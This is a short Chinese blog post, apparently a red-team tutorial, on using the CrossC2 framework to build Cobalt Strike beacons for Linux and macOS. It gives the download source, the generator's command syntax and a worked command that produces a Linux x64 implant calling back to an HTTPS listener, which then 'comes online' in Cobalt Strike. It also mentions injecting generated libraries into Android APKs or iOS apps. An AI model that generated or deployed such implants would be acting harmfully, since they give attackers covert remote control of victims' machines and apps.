利用CrossC2生成多平台Cobaltstrike客户端
用过MSF的同学应该都知道,msf可以生成Linux、Windows、Android等等多平台的木马端,但是Cobaltstrike这个后渗透利器,只能生成Windows的客户端,有时候用起来着实不方便。
使用CrossC2框架可以帮我们生成Linux 和 MACos的Cobaltstrike客户端
首先到
https://link.zhihu.com/?target=https%3A//github.com/Mr-xn/CrossC2/tree/master/src
下载于CS服务端对于的可执行文件
下载完成以后,上传到cs服务端目录下
客户端生成格式
genCrossC2 [host] [port] [beaconKey_file] [rebind_dynamic_lib] [platform] [arch] [outputFileName]
目前 CrossC2只支持https通道,所以我们还需要新建一个https监听
然后我们生成一个linux 64位的来进行测试
./genCrossC2.Linux ip 端口 null null Linux x64 test
执行test以后,cs上成功上线
但是目前这款框架执行了只支持cs3.14的版本,cs4.0的版本,可以正常上线,但是无法执行命令,就这样
从项目文档上来看,这款框架还支持生成Android和iOS的客户端
但是生成的都是动态库文件,需要自己将动态库打包进指定的APK安装包,或者注入指定的App中。